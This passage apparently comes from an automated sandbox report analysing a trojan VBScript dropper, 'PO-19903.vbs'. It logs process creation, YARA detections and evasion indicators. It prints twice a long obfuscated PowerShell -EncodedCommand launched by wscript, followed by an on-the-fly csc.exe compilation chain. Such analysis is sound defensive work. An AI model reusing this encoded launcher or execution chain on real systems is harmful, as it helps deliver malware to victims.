UwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732Jump to behavior
    Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: PO-19903.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FAB47818_2_00FAB478
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711CA018_2_07711CA0
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OVER.datJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA2F52 push FFFFFF8Bh; iretd 18_2_00FA2F54
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA12A1 push es; ret 18_2_00FA12B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
